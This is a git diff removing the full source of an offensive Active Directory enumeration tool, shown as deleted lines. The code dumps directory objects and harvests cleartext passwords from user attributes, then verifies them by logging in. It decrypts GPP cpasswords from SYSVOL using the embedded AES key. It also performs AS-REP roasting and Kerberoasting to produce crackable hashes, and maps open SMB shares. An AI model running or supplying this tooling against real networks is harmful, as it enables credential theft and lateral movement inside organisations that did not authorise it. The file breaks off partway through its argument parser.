diff --git a/activeDirectoryEnum.py b/activeDirectoryEnum.py deleted file mode 100755 index d3fdd96..0000000 --- a/activeDirectoryEnum.py +++ /dev/null @@ -1,818 +0,0 @@ -#!/usr/bin/env python3 -import warnings -from ldap3 import Server, Connection, ALL, SUBTREE -from progressbar import Bar, Percentage, ProgressBar, ETA -from ldap3.core.exceptions import LDAPKeyError -from impacket.smbconnection import SessionError -from impacket.nmb import NetBIOSTimeout, NetBIOSError -from getpass import getpass -from termcolor import colored -from impacket import smbconnection -import contextlib, argparse, textwrap, sys, socket, json, re, os, base64 -from Cryptodome.Cipher import AES -from dns.resolver import NXDOMAIN - -# Thanks SecureAuthCorp for GetNPUsers.py -# For Kerberos preauthentication -from impacket.krb5 import constants -from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, AS_REP, seq_set, seq_set_iter -from impacket.krb5.kerberosv5 import sendReceive, KerberosError -from impacket.krb5.types import KerberosTime, Principal -from pyasn1.codec.der import decoder, encoder -from pyasn1.type.univ import noValue -from binascii import hexlify -import datetime, random - -# Thanks SecureAuthCorp for GetUserSPNs.py -# For SPN enum -from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS -from impacket.ntlm import compute_lmhash, compute_nthash -from impacket.krb5.asn1 import TGS_REP - -from external.bloodhound import BloodHound, resolve_collection_methods -from external.bloodhound.ad.domain import AD -from external.bloodhound.ad.authentication import ADAuthentication - - -class EnumAD(): - - def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, domuser=None, computer=None): - warnings.warn("Deprecation warning: This module receives no new updates. 
Use pip package instead", UserWarning) - self.server = domainController - self.domuser = domuser - self.ldaps = ldaps - self.output = output - self.bhout = bhout - self.kpre = kpre - self.spnEnum = spnEnum - self.enumsmb = enumsmb - self.searchSysvol = searchSysvol - - self.ou_structure = domainController.split('.') - self.dc_string='' - for element in self.ou_structure: - self.dc_string += 'dc={},'.format(element) - - # LDAP properties - # At the moment we just want everything - self.ldapProps = ["*"] - - - # Setting lists containing elements we want from the domain controller - self.computers = [] - self.people = [] - self.groups = [] - self.spn = [] - self.acl = [] - self.gpo = [] - self.domains = [] - self.ous = [] - self.deletedUsers = [] - self.passwd = False - - if domuser is not False: - self.runWithCreds() - else: - self.runWithoutCreds() - - - def runWithCreds(self): - self.CREDS = True - if not self.passwd: - self.passwd = str(getpass()) - self.bind() - self.search() - - if self.output: - self.write_file() - - self.checkForPW() - self.checkOS() - if self.searchSysvol: - self.checkSYSVOL() - - if self.bhout: - self.outputToBloodhoundJson() - - if self.kpre: - self.enumKerbPre() - - if self.spnEnum: - self.enumSPNUsers() - - self.conn.unbind() - - if self.enumsmb: - # Setting variables for further testing and analysis - self.smbShareCandidates = [] - self.smbBrowseable = {} - self.sortComputers() - self.enumSMB() - - # Lets clear variable now - self.passwd = None - - - def runWithoutCreds(self): - self.CREDS = False - print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials') - self.passwd = '' - self.domuser = '' - print('') - - self.bind() - self.search() - - if self.output: - self.write_file() - - self.checkForPW() - self.checkOS() - - self.enumForCreds(self.people) - - print('[ ' + colored('WARN', 'yellow') +' ] Didn\'t find useable info as anonymous user, please gather credentials and run again') - exit(0) - - - 
@contextlib.contextmanager - def suppressOutput(self): - with open(os.devnull, 'w') as devnull: - with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out: - yield (err, out) - - - def bind(self): - try: - if self.ldaps: - self.dc_conn = Server(self.server, port=636, use_ssl=True, get_info='ALL') - self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd) - self.conn.bind() - self.conn.start_tls() - # Validate the login (bind) request - if int(self.conn.result['result']) != 0: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.conn.result['description'])) - sys.exit(1) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server)) - else: - self.dc_conn = Server(self.server, get_info=ALL) - self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd) - self.conn.bind() - # Validate the login (bind) request - if int(self.conn.result['result']) != 0: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.conn.result['description'])) - sys.exit(1) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server)) - # TODO: Catch individual exceptions instead - except Exception: - if self.ldaps: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server)) - else: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server)) - sys.exit(1) - - - def search(self): - # Get computer objects - self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.computers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Computer objects') - - # Get person objects - 
self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.people.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Person objects') - - # Get group objects - self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.groups.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Group objects') - - # Get SPN objects - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.spn.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all SPN objects') - - # Get ACL objects - self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.acl.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all ACL objects') - - # Get GPO objects - self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.gpo.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all GPO objects') - - # Get Domain - self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.domains.append(entry) - print('[ ' + 
colored('OK', 'green') +' ] Got all Domains') - - # Get OUs - self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.ous.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all OUs') - - # Get deleted users - self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)]) - for entry in self.conn.entries: - self.deletedUsers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all deleted users') - if len(self.deletedUsers) > 0: - print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') - self.enumForCreds(self.deletedUsers) - - - ''' - Since it sometimes is real that the property 'userPassword:' is set - we test for it and dump the passwords - ''' - def checkForPW(self): - passwords = {} - idx = 0 - for _ in self.people: - user = json.loads(self.people[idx].entry_to_json()) - idx += 1 - if user['attributes'].get('userPassword') is not None: - passwords[user['attributes']['name'][0]] = user['attributes'].get('userPassword') - if len(passwords.keys()) > 0: - with open('{0}-clearpw'.format(self.server), 'w') as f: - json.dump(passwords, f, sort_keys=False) - - if len(passwords.keys()) == 1: - print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(passwords.keys()))) - elif len(passwords.keys()) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text password'.format(len(passwords.keys()))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(passwords.keys()))) - - - ''' - While it is not unusual to find EOL servers hidden or forgotten these - often makes easier targets for lateral movemen, and because of that - we'll dump the lowest registered OS and the respective hosts for easier - enumeration afterwards - ''' - def checkOS(self): - 
- os_json = { - # Should perhaps include older version - "Windows XP": [], - "Windows Server 2008": [], - "Windows 7": [], - "Windows Server 2012": [], - "Windows 10": [], - "Windows Server 2016": [], - "Windows Server 2019": [] - } - idx = 0 - for _ in self.computers: - computer = json.loads(self.computers[idx].entry_to_json()) - idx += 1 - - for os_version in os_json.keys(): - try: - if os_version in computer['attributes'].get('operatingSystem'): - os_json[os_version].append(computer['attributes']['dNSHostName']) - except TypeError: - # computer['attributes'].get('operatingSystem') is of NoneType, just continue - continue - - for key, value in os_json.items(): - if len(value) == 0: - continue - with open('{0}-oldest-OS'.format(self.server), 'w') as f: - for item in value: - f.write('{0}: {1}\n'.format(key, item)) - break - - print('[ ' + colored('OK', 'green') + ' ] Wrote hosts with oldest OS to {0}-oldest-OS'.format(self.server)) - - - def checkSYSVOL(self): - print('[ .. ] Searching SYSVOL for cpasswords\r') - cpasswords = {} - try: - smbconn = smbconnection.SMBConnection('\\\\{0}\\'.format(self.server), self.server, timeout=5) - smbconn.login(self.domuser, self.passwd) - dirs = smbconn.listShares() - for share in dirs: - if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol': - path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2] - for dirname in paths: - try: - # Dont want . or .. 
- subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*') - for sub in subPath: - if len(sub.get_shortname()) > 2: - paths.append(dirname + '\\' + sub.get_shortname()) - except (SessionError, UnicodeEncodeError, NetBIOSError) as e: - continue - - # Compile regexes for username and passwords - cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"') - unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"') - - # Prepare the ciphers based on MSDN article with key and IV - cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16)) - - # Since the first entry is the DC we dont want that - for item in paths[1:]: - if '.xml' in item.split('\\')[-1]: - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f: - smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write) - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f: - try: - fileContent = f.read() - passwdMatch = cpassRE.findall(str(fileContent)) - for passwd in passwdMatch: - unameMatch = unameRE.findall(str(fileContent)) - for usr in unameMatch: - padding = '=' * (4 - len(passwd) % 4) - # For some reason, trailing nul bytes were on each character, so we remove any if they are there - cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '') - except (UnicodeDecodeError, AttributeError) as e: - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - continue - - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - - if len(cpasswords.keys()) > 0: - with open('{0}-cpasswords.json'.format(self.server), 'w') as f: - json.dump(cpasswords, f) - - if len(cpasswords.keys()) == 1: - print('\033[1A\r[ ' + colored('OK', 
'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys()))) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys()))) - - - except (SessionError, UnicodeEncodeError, NetBIOSError): - print('[ ' + colored('ERROR', 'red') + ' ] Some error occoured while searching SYSVOL') - else: - smbconn.close() - - - def splitJsonArr(self, arr): - if isinstance(arr, list): - if len(arr) == 1: - return arr[0] - return arr - - - def outputToBloodhoundJson(self): - print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...') - try: - with self.suppressOutput(): - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server) - auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server) - try: - ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # So we didnt succeed with DNS lookup. 
Most likely an internal, so lets try to point to the DC - print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver') - try: - ns = socket.gethostbyname(self.server) - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns) - ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # I'm all out of luck - print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver') - exit(1) - with self.suppressOutput(): - bloodhound = BloodHound(ad) - bloodhound.connect() - collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote') - bloodhound.run(collect=collection, num_workers=40, disable_pooling=False) - print('[ ' + colored('OK', 'green') +' ] BloodHound output generated') - except Exception as e: - print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}') - - - def sortComputers(self): - for computer in self.computers: - try: - self.smbShareCandidates.append(computer['dNSHostName']) - except LDAPKeyError: - # No dnsname registered - continue - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates))) - - - def enumSMB(self): - progBar = ProgressBar(widgets=['SMBConnection test: ', Percentage(), Bar(), ETA()], maxval=len(self.smbShareCandidates)).start() - prog = 0 - try: - for dnsname in self.smbShareCandidates: - try: - # Changing default timeout as shares should respond withing 5 seconds if there is a share - # and ACLs make it available to self.user with self.passwd - smbconn = smbconnection.SMBConnection('\\\\' + str(dnsname), str(dnsname), timeout=5) - smbconn.login(self.domuser, self.passwd) - 
dirs = smbconn.listShares() - self.smbBrowseable[str(dnsname)] = {} - for share in dirs: - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = '' - try: - _ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True - except (SessionError, UnicodeEncodeError, NetBIOSError): - # Didnt have permission, all good - # Im second guessing the below adding to the JSON file as we're only interested in the listable directories really - #self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False - continue - smbconn.logoff() - progBar.update(prog + 1) - prog += 1 - except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError): - # TODO: Examine why we sometimes get: - # impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE - # on healthy shares. It seems to be reported with CIF shares - progBar.update(prog + 1) - prog += 1 - continue - except ValueError: - # We reached end of progressbar, continue since we finish below - pass - progBar.finish() - print('') - - availDirs = [] - for key, value in self.smbBrowseable.items(): - for _, v in value.items(): - if v: - availDirs.append(key) - - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - else: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} with {2} subdirectories/file sare browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - if len(self.smbBrowseable.keys()) > 0: - with open('{0}-open-smb.json'.format(self.server), 'w') as f: - json.dump(self.smbBrowseable, f, indent=4, sort_keys=False) - print('[ ' + colored('OK', 'green') + ' ] Wrote browseable shares to 
{0}-open-smb.json'.format(self.server)) - - - - def write_file(self): - with open(str(self.output) + '-computers', 'w') as f: - for item in self.computers: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-people', 'w') as f: - for item in self.people: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-groups', 'w') as f: - for item in self.groups: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-spn', 'w') as f: - for item in self.spn: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-acl', 'w') as f: - for item in self.acl: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-gpo', 'w') as f: - for item in self.gpo: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-domains', 'w') as f: - for item in self.domains: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-ous', 'w') as f: - for item in self.ous: - f.write(str(item)) - f.write("\n") - - print('[ ' + colored('OK', 'green') +' ] Wrote all files to {0}-obj_name'.format(self.output)) - - - def enumKerbPre(self): - # Build user array - users = [] - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - users.append(str(entry['sAMAccountName']) + '@{0}'.format(self.server)) - if len(users) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - elif len(users) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users))) - else: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - - hashes = [] - # Build request for Tickets - for usr in users: - clientName = Principal(usr, 
type=constants.PrincipalNameType.NT_PRINCIPAL.value) - asReq = AS_REQ() - domain = str(self.server).upper() - serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value) - pacReq = KERB_PA_PAC_REQUEST() - pacReq['include-pac'] = True - encodedPacReq = encoder.encode(pacReq) - asReq['pvno'] = 5 - asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value) - asReq['padata'] = noValue - asReq['padata'][0] = noValue - asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) - asReq['padata'][0]['padata-value'] = encodedPacReq - - requestBody = seq_set(asReq, 'req-body') - - options = list() - options.append(constants.KDCOptions.forwardable.value) - options.append(constants.KDCOptions.renewable.value) - options.append(constants.KDCOptions.proxiable.value) - requestBody['kdc-options'] = constants.encodeFlags(options) - - seq_set(requestBody, 'sname', serverName.components_to_asn1) - seq_set(requestBody, 'cname', clientName.components_to_asn1) - - requestBody['realm'] = domain - - now = datetime.datetime.utcnow() + datetime.timedelta(days=1) - requestBody['till'] = KerberosTime.to_asn1(now) - requestBody['rtime'] = KerberosTime.to_asn1(now) - requestBody['nonce'] = random.getrandbits(31) - - supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) - - seq_set_iter(requestBody, 'etype', supportedCiphers) - - msg = encoder.encode(asReq) - - try: - response = sendReceive(msg, domain, self.server) - except KerberosError as e: - if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: - supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),) - seq_set_iter(requestBody, 'etype', supportedCiphers) - msg = encoder.encode(asReq) - response = sendReceive(msg, domain, self.server) - else: - print(e) - continue - - asRep = decoder.decode(response, asn1Spec=AS_REP())[0] - - 
hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())) - - if len(hashes) > 0: - with open('{0}-jtr-hashes'.format(self.server), 'w') as f: - for h in hashes: - f.write(str(h) + '\n') - - print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got 0 hashes') - - - def enumSPNUsers(self): - users_spn = { - } - user_tickets = { - } - - userDomain = self.domuser.split('@')[1] - - idx = 0 - for entry in self.spn: - # TODO: Consider a better name than spn since spn is referenced below. It's confusing. - spn = json.loads(self.spn[idx].entry_to_json()) - users_spn[self.splitJsonArr(spn['attributes'].get('name'))] = self.splitJsonArr(spn['attributes'].get('servicePrincipalName')) - idx += 1 - - # Get TGT for the supplied user - client = Principal(self.domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value) - try: - # We need to take the domain from the user@domain since it *could* be a cross-domain user - tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(self.passwd), compute_nthash(self.passwd), None, kdcHost=None) - - TGT = {} - TGT['KDC_REP'] = tgt - TGT['cipher'] = cipher - TGT['sessionKey'] = newSession - - for user, spns in users_spn.items(): - if isinstance(spns, list): - # We only really need one to get a ticket - spn = spns[0] # lgtm [py/multiple-definition] - else: - spn = spns - try: - # Get the TGS - serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value) - tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']) - # Decode the TGS - decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0] - # Get different encryption types - if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value: - 
entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - - except KerberosError: - # For now continue - # TODO: Maybe look deeper into issue here - continue - - if len(user_tickets.keys()) > 0: - with open('{0}-spn-tickets'.format(self.server), 'w') as f: - for key, value in user_tickets.items(): - f.write('{0}:{1}\n'.format(key, value)) - if len(user_tickets.keys()) == 1: - print('[ ' 
+ colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys()))) - - - except KerberosError as err: - print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) - - - def enumForCreds(self, ldapdump): - searchTerms = [ - 'legacy', 'pass', 'password', 'pwd', 'passcode' - ] - excludeTerms = [ - 'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN' - ] - possiblePass = {} - idx = 0 - for _ in ldapdump: - user = json.loads(ldapdump[idx].entry_to_json()) - for prop, value in user['attributes'].items(): - if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms): - try: - possiblePass[user['attributes']['userPrincipalName'][0]] = value[0] - except KeyError: - # Could be a service user instead - try: - possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0] - except KeyError: - # Don't know which type - continue - - idx += 1 - if len(possiblePass) > 0: - print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties') - print('[ ' + colored('INFO', 'green') +' ] Attempting to determine if it is a password') - - for user, password in possiblePass.items(): - try: - usr, passwd = self.entroPass(user, password) - except TypeError: - # None returned, just continue - continue - if not self.CREDS: - self.domuser = usr - self.passwd = passwd - self.runWithCreds() - exit(0) - - - def entroPass(self, user, password): - if not password: - return None - # First check if it is a clear text - dc_test_conn = 
Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=password) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password)) - print('') - return user, password - - test_conn.unbind() - - # Attempt for base64 - # Could be base64, lets try - try: - pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8') - except base64.binascii.Error: - return None - - # Attempt decoded PW - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=pw) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw)) - print('') - return user, pw - - -if __name__ == "__main__": - parser = argparse.ArgumentParser(prog='activeDirectoryEnum', 
formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(''' - ___ __ _ ____ _ __ ______ - / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___ - / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\ - / ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / / - /_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/ - /____/ - - |*----------------------------------------------------------------------------------------------------------*| - - ''')) - parser.add_argument('dc', type=str, help='Hostname of the Domain Controller') - parser.add_argument('-o', '--out-file', type=str, help='Path to output file. If no path, CWD is assumed (default: None)') - parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`') - parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true') - parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true') - parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true') - parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true') - parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true') - parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true') - parser.add_argument('--all', help='Run all checks', action='store_true') - parser.add_argument('--no-creds', help='Start without credentials', action='store_true') - - if len(sys.argv) == 1: - parser.print_help(sys.stderr) - #warnings.warn("Deprecation 
